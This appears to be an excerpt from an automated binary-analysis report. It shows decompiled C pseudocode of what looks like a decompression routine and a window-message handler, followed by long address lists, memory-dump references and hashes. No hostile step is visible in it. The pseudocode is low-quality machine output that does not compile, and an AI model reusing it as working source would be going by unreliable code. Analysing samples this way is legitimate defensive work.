									 *(__esp + 0x10) =  *(__esp + 0x10) >> 3;
									__edi = __edi - 3;
									 *__esi = 6;
									L99:
									__eax =  *(__esp + 0x10);
									goto L100;
								}
								goto L128;
							case 0xc:
								L18:
								__eax = __eax >> 3;
								 *(__esp + 0x10) = __eax;
								__edi = __edi - 3;
								 *__esi = 3;
								goto L100;
							case 0xd:
								L106:
								 *(__esp + 0x10) =  *(__esp + 0x10) >> 3;
								 *__esi = 9;
								 *(__ebx + 0x18) = "invalid block type";
								__esi[8] =  *(__esp + 0x10) >> 3;
								__edi = __edi + 0xfffffffd;
								_push(0xfffffffd);
								goto L6;
						}
						L100:
						_t392 =  *_t422;
					} while (_t392 <= 9);
					goto L4;
				} else {
					L4:
					_push(0xfffffffe);
					L5:
					_t422[8] =  *(_t424 + 0x14);
					L6:
					_t422[7] = _t418;
					_t388[1] =  *(_t424 + 0x1c);
					L7:
					 *_t388 = _t423;
					_t388[2] = _t388[2] + _t423 -  *_t388;
					_t422[0xd] =  *(_t424 + 0x18);
					return E00405690(_t388, _t422);
				}
				L128:
			}

0x00405f86
0x00405f8b
0x00405f90
0x00405f92
0x00405f96
0x00405f9d
0x00405fa1
0x00405fa5
0x00405fa8
0x00405fac
0x00405fc0
0x00405fc4
0x00405fae
0x00405fb7
0x00405fb7
0x00405fc8
0x00405fcd
0x00406006
0x00406006
0x00000000
0x0040600d
0x00406010
0x00406043
0x00406045
0x0040604d
0x0040604f
0x00406052
0x00406055
0x00000000
0x0040605b
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605b
0x00406012
0x00406012
0x00406012
0x00406017
0x00000000
0x00000000
0x00406021
0x00406028
0x0040602a
0x0040602d
0x00406030
0x00406038
0x0040603a
0x0040603d
0x00406041
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406041
0x004066d5
0x004066d8
0x004066db
0x00000000
0x004066db
0x00000000
0x00000000
0x004060ea
0x004060ed
0x00406120
0x00406120
0x00406122
0x00406124
0x0040612a
0x0040612d
0x0040612f
0x0040674a
0x00406750
0x00000000
0x00406135
0x00406135
0x00406137
0x00406139
0x0040613b
0x0040613e
0x00406142
0x00406153
0x00406155
0x00406157
0x0040615a
0x00406144
0x00406144
0x00406149
0x00406149
0x00000000
0x00406142
0x004060ef
0x004060ef
0x004060ef
0x004060f4
0x00000000
0x00000000
0x004060fa
0x004060fe
0x00406103
0x00406105
0x00406107
0x0040610a
0x0040610d
0x00406115
0x00406117
0x0040611a
0x0040611e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040611e
0x00000000
0x004060ef
0x00000000
0x00000000
0x00406161
0x00406166
0x00000000
0x0040616c
0x0040616c
0x0040616e
0x00406214
0x00406214
0x00406217
0x0040621b
0x0040621d
0x00406225
0x00406229
0x0040622b
0x0040622d
0x0040622d
0x00406231
0x00406235
0x00406237
0x00406239
0x00406239
0x0040623d
0x00406248
0x0040624d
0x00406251
0x00406255
0x00406259
0x00406260
0x00406262
0x00406262
0x00406262
0x00406265
0x0040626e
0x00406270
0x00406272
0x00406275
0x00406275
0x00000000
0x00406174
0x00406174
0x00406177
0x0040617b
0x004061a4
0x004061a4
0x004061a8
0x004061ad
0x004061b0
0x004061b5
0x004061b8
0x004061bc
0x004061c2
0x004061c4
0x004061c8
0x004061d7
0x004061da
0x004061da
0x004061de
0x004061e2
0x004061ca
0x004061cc
0x004061ce
0x004061d1
0x004061d1
0x004061e4
0x004061e7
0x004061eb
0x004061ed
0x004061f0
0x004061f2
0x004061f4
0x004061f8
0x00406203
0x00406206
0x00406206
0x004061fa
0x004061fa
0x004061ff
0x004061ff
0x00406208
0x00406208
0x004061f2
0x0040620c
0x0040620e
0x004067c0
0x004067c4
0x004067c8
0x004067cb
0x004067ce
0x004066e2
0x004066e2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040617d
0x0040617d
0x00406180
0x00406183
0x00406185
0x00000000
0x00406187
0x00406187
0x0040618b
0x00406198
0x00406198
0x0040619a
0x0040619c
0x0040618d
0x0040618d
0x0040618f
0x00406192
0x00406192
0x004061a0
0x004061a2
0x00000000
0x00000000
0x00000000
0x00000000
0x004061a2
0x00406185
0x0040617b
0x0040616e
0x00000000
0x00000000
0x0040627c
0x0040627f
0x004062b2
0x004062b2
0x004062b7
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x00406809
0x00406809
0x0040680f
0x00000000
0x004062c8
0x004062c8
0x004062cb
0x004062ce
0x004062d1
0x00000000
0x004062d7
0x004062d7
0x004062da
0x004062e1
0x004062e4
0x004062e6
0x004062e7
0x004062e8
0x004062ea
0x004062ed
0x004062ef
0x004062f2
0x004067d6
0x004067da
0x004067de
0x004067e1
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x004067ef
0x004067f2
0x004067f6
0x004067f9
0x00406801
0x00406808
0x004062f8
0x004062f8
0x004062fd
0x00406301
0x00406301
0x00406304
0x0040630b
0x00000000
0x0040630b
0x004062f2
0x004062d1
0x00406281
0x00406281
0x00406281
0x00406286
0x00000000
0x00000000
0x0040628c
0x00406290
0x00406295
0x00406297
0x00406299
0x0040629c
0x0040629f
0x004062a7
0x004062a9
0x004062ac
0x004062b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062b0
0x00000000
0x00406281
0x00000000
0x00000000
0x00406311
0x00406314
0x00406317
0x0040631a
0x0040631d
0x00406388
0x00406388
0x0040638c
0x0040638e
0x00406393
0x00406393
0x00406396
0x0040639d
0x004063a0
0x004063a7
0x004063aa
0x004063aa
0x00406393
0x004063b4
0x004063b7
0x004063ba
0x004063c0
0x004063c6
0x004063ce
0x004063d0
0x004063d4
0x0040681b
0x00406820
0x00406822
0x00406825
0x00406828
0x0040682b
0x0040682c
0x0040682d
0x0040682f
0x00406832
0x00406832
0x00406838
0x0040683c
0x00406840
0x00406843
0x00406846
0x00406849
0x004066e6
0x004066ee
0x004066f0
0x004066f0
0x004066f0
0x004066f4
0x00406706
0x004063da
0x004063da
0x004063dd
0x004063e1
0x00000000
0x004063e1
0x0040631f
0x0040631f
0x0040631f
0x00406322
0x00000000
0x00406324
0x00406324
0x00406324
0x00406329
0x00000000
0x00000000
0x0040632f
0x00406333
0x00406338
0x0040633a
0x0040633c
0x0040633f
0x00406342
0x0040634a
0x0040634c
0x0040634f
0x00406353
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406353
0x00000000
0x00406324
0x00000000
0x00406355
0x00406355
0x00406358
0x0040635f
0x00406365
0x00406368
0x0040636c
0x0040636f
0x00406373
0x00406376
0x00406379
0x0040637c
0x0040637f
0x00406382
0x00406382
0x00000000
0x0040631f
0x00000000
0x00000000
0x004063e7
0x004063e7
0x004063ec
0x004063ef
0x004063f5
0x004063f5
0x004063fc
0x004063ff
0x00406591
0x00406591
0x00406594
0x00406598
0x0040659d
0x004065a7
0x004065af
0x004065b4
0x004065b8
0x004065bf
0x004065c5
0x004065cc
0x004065d4
0x004065dc
0x004065e4
0x004065e6
0x004065ea
0x0040689f
0x004068a4
0x004068a6
0x004068a9
0x004068ac
0x004068af
0x004068b0
0x004068b1
0x004068b3
0x004068b6
0x004068b6
0x004068bc
0x004068c0
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d1
0x00000000
0x004065f0
0x004065f0
0x004065f4
0x004065f8
0x004065fd
0x00406604
0x00406606
0x0040660e
0x00406610
0x004068d7
0x004068db
0x004068df
0x004068e2
0x004068e6
0x004068eb
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x004068fa
0x00406902
0x00406909
0x00406616
0x00406616
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406623
0x00406624
0x00406626
0x00406629
0x00000000
0x00406629
0x00406610
0x00406405
0x0040640b
0x0040640b
0x0040640e
0x00406410
0x00000000
0x00000000
0x00000000
0x00000000
0x00406412
0x00406412
0x00406412
0x00406417
0x00000000
0x00000000
0x0040641d
0x00406421
0x00406426
0x00406428
0x0040642a
0x0040642d
0x00406430
0x00406433
0x00406435
0x00406437
0x0040643f
0x00406443
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406443
0x0040678a
0x0040678a
0x0040678e
0x00406792
0x00406795
0x00406799
0x0040679e
0x004067a0
0x004067a7
0x004067a7
0x004067a7
0x004067aa
0x004067ad
0x004067b0
0x004067b8
0x004067bf
0x00000000
0x00406445
0x00406445
0x0040644c
0x00406451
0x00406454
0x00406458
0x0040645b
0x0040645e
0x00406462
0x00406466
0x00406482
0x00406485
0x00406491
0x00406491
0x00406494
0x00406487
0x00406487
0x00406487
0x00406498
0x0040649a
0x0040649d
0x004064a4
0x004064ab
0x004064af
0x004064b3
0x004064b5
0x004064b7
0x004064bb
0x004064f2
0x004064f2
0x004064f6
0x004064f8
0x00406503
0x00406505
0x0040650b
0x0040650f
0x00406513
0x00406515
0x0040651a
0x0040651d
0x00406523
0x00406523
0x0040652a
0x0040652e
0x00406530
0x00406533
0x00406535
0x00406537
0x00406852
0x00406852
0x00406855
0x00406858
0x0040685b
0x0040685c
0x0040685d
0x0040685f
0x00406863
0x00406867
0x0040686d
0x00406874
0x00406877
0x0040687b
0x00406880
0x00406882
0x00406885
0x00406885
0x00406885
0x00406888
0x0040688c
0x0040688f
0x00406897
0x0040689e
0x0040653d
0x0040653d
0x00406542
0x00406556
0x00000000
0x00406544
0x00406544
0x00406547
0x00000000
0x0040654d
0x0040654d
0x00406550
0x00406560
0x00406560
0x00406560
0x00406563
0x00406566
0x00406569
0x00406569
0x00406569
0x00406569
0x00406570
0x00000000
0x00406570
0x00406547
0x00406542
0x004064c0
0x004064c0
0x004064c0
0x004064c5
0x00000000
0x00000000
0x004064cb
0x004064cf
0x004064d4
0x004064d6
0x004064d8
0x004064db
0x004064de
0x004064e6
0x004064e8
0x004064ec
0x004064f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004064f0
0x0040672f
0x0040672f
0x00406733
0x00406736
0x0040673a
0x0040673d
0x00406744
0x00000000
0x00406744
0x00406468
0x00406468
0x0040646a
0x0040646c
0x0040646f
0x00406473
0x00406476
0x00406479
0x00406573
0x00406573
0x00406578
0x0040657b
0x00406581
0x00406581
0x00406588
0x0040658b
0x00406407
0x0040640b
0x0040640e
0x00406410
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040658b
0x00000000
0x00406466
0x0040640b
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406637
0x0040663a
0x0040663e
0x00406641
0x00406644
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406654
0x00406655
0x00406657
0x00406659
0x0040665e
0x00406661
0x00406664
0x0040690b
0x00406913
0x0040691a
0x0040666a
0x0040666a
0x0040666d
0x0040666f
0x0040667c
0x0040667f
0x00406682
0x00406685
0x00406687
0x0040668a
0x0040668e
0x00406691
0x00406693
0x00406697
0x0040669b
0x004066a4
0x004066a7
0x004066a7
0x0040669d
0x0040669d
0x0040669f
0x0040669f
0x004066a9
0x004066ad
0x004066b1
0x0040691b
0x00000000
0x004066b7
0x004066b7
0x00000000
0x004066b7
0x004066b1
0x00000000
0x00000000
0x00406921
0x00406921
0x00406925
0x0040692a
0x0040692d
0x00406932
0x00406938
0x0040693b
0x0040693f
0x00406958
0x00000000
0x00406941
0x00406941
0x00406945
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00000000
0x00406952
0x00000000
0x00000000
0x0040695e
0x0040695e
0x00406962
0x00406966
0x00406969
0x0040696d
0x00406972
0x00406974
0x00406977
0x00406977
0x00406977
0x0040697a
0x0040697e
0x00406981
0x00406989
0x00406990
0x00000000
0x00000000
0x00406757
0x00406757
0x0040675b
0x0040675f
0x00406762
0x00406766
0x0040676b
0x0040676d
0x00406770
0x00406770
0x00406770
0x00406773
0x00406777
0x0040677a
0x00406782
0x00406789
0x00000000
0x00000000
0x00406062
0x00406062
0x00406067
0x0040606d
0x0040606f
0x00406071
0x00406077
0x00000000
0x00000000
0x00406080
0x00406080
0x00406085
0x00406089
0x00406091
0x00406096
0x0040609a
0x0040609e
0x004060a6
0x004060ad
0x004060af
0x004060b7
0x004060b9
0x004060bc
0x00406707
0x00000000
0x004060c2
0x004060c2
0x004060c7
0x004060ca
0x004066bd
0x004066bd
0x00000000
0x004066bd
0x00000000
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060dc
0x004060df
0x00000000
0x00000000
0x0040670e
0x00406712
0x00406715
0x0040671b
0x00406722
0x00406725
0x00406728
0x00000000
0x00000000
0x004066c1
0x004066c1
0x004066c3
0x00000000
0x00405fcf
0x00405fcf
0x00405fcf
0x00405fd1
0x00405fd5
0x00405fd8
0x00405fdc
0x00405fdf
0x00405fe2
0x00405fea
0x00405fec
0x00405fef
0x00406001
0x00406001
0x00000000

Strings

dJD, xrefs: 00406750

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: dJD
API String ID: 0-3417872616
Opcode ID: 7a5dc83028d02a09d406cc241367b98b1cda1dcc6a5ccefa56ac3c432947e02a
Instruction ID: c18281792e8e59407f3a96b6e4398c8f32018dfa10aa7c63b288b17e9e91fcfd
Opcode Fuzzy Hash: 7a5dc83028d02a09d406cc241367b98b1cda1dcc6a5ccefa56ac3c432947e02a
Instruction Fuzzy Hash: 77625EB1A047018FC714CF28D58052BBBE1FF88314F158A2EE89A9B785D739E949CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00412A67, Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 36%

			E00412A67(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				void* _t219;
				unsigned int _t225;
				void* _t226;

				_t200 = __ecx;
				_push(0x70);
				E004271DA(E0043A239, __ebx, __edi, __esi);
				_t223 = __ecx;
				 *((intOrPtr*)(_t226 - 0x10)) = 0;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t226 + 8);
				 *(_t226 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t225 =  *(_t226 + 0x10);
						if(_t189 == 6) {
							E00412436(_t200, _t219, _t223,  *((intOrPtr*)(_t226 + 0xc)), E00410E42(_t189, _t226, _t225));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t223 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t223 + 0x28))();
								 *(_t226 + 0x10) = _t149;
								E0040FB00(_t226 - 0x14, 7);
								_t194 = 0x450cc8 + ((_t149 ^  *(_t226 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t226 + 8) -  *_t194;
								 *(_t226 - 0x18) = _t194;
								if( *(_t226 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t226 - 0x18);
									_t195 =  *(_t226 + 0x10);
									 *_t152 =  *(_t226 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t226 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t226 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t226 + 0x10) + 4)));
											while(1) {
												_t196 = E0040F357();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t226 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t226 + 8)) {
													( *(_t226 - 0x18))[1] = _t196;
													E0040FB2F(_t226 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t225);
													_push( *((intOrPtr*)(_t226 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t226 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t226 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t226 + 0x10) = _t195;
											continue;
										}
										_push( *(_t226 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E0040F357();
										__eflags = _t166;
										 *(_t226 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t226 - 0x18))[1] = _t166;
										E0040FB2F(_t226 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t226 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M00412F7F))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E004140EE(__ebx, __edx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E00410E42(__ebx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E00410E42(__ebx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E00413BFC(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E0040FB49(__ebp - 0x7c, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E00410E69(__ebx, __edx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E004216E0(__eax + 0x24,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E004115CB(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E00413BFC(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E00414160(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E00410E42(__ebx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E0040E7CD(__ebx, __edx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E00410E42(__ebx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E00410E42(__ebx, __ebp,  *(__ebp + 0xc)));
												_push(E00410E42(__ebx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E004140EE(__ebx, __edx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E0040E7CD(__ebx, __edx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E0040E7CD(__ebx, __edx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E00410E42(__ebx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L79:
												_push(__eax);
												__eax = E00410E42(__ebx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E00410E42(__ebx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00410E42(__ebx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E00410E42(__ebx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
												E0040FB2F(_t226 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t226 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E0040FB2F(_t226 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t226 + 0x10) - _t173[2];
								if( *(_t226 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t226 + 0x10) = _t196;
								E0040FB2F(_t226 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t226 + 8) - 0xc000;
								if( *(_t226 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t223 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t226 + 0xc)), _t225, _t226 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E004124AC(_t189, _t219, _t223, _t223, _t225, _t225 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t226 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t226 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t226 - 0x10));
								}
								 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
								E0040FB2F(_t226 - 0x14);
								_t163 = 1;
								L40:
								return E004272B2(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t226 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t226 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t226 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t226 + 0x10));
				_push( *((intOrPtr*)(_t226 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x00412a67
0x00412a67
0x00412a6e
0x00412a73
0x00412a77
0x00412a7a
0x00412a81
0x00412a8a
0x00412a8d
0x00412ab1
0x00412ab4
0x00412ae0
0x00412ae3
0x00412ae6
0x00412af3
0x00412af3
0x00412af8
0x00412afb
0x00412b11
0x00412b11
0x00412b14
0x00412b16
0x00412b65
0x00412b69
0x00412b76
0x00412b7f
0x00412b8a
0x00412b90
0x00412b92
0x00412b95
0x00412bc5
0x00412bc5
0x00412bc8
0x00412bce
0x00412bd0
0x00412c5f
0x00412c5f
0x00412c62
0x00000000
0x00000000
0x00412bd8
0x00412bdf
0x00412be1
0x00412be3
0x00412c27
0x00412c2c
0x00412c4a
0x00412c4f
0x00412c51
0x00412c53
0x00000000
0x00000000
0x00412c35
0x00412c37
0x00412f48
0x00412f4b
0x00412f50
0x00412f50
0x00412f53
0x00412f53
0x00412f54
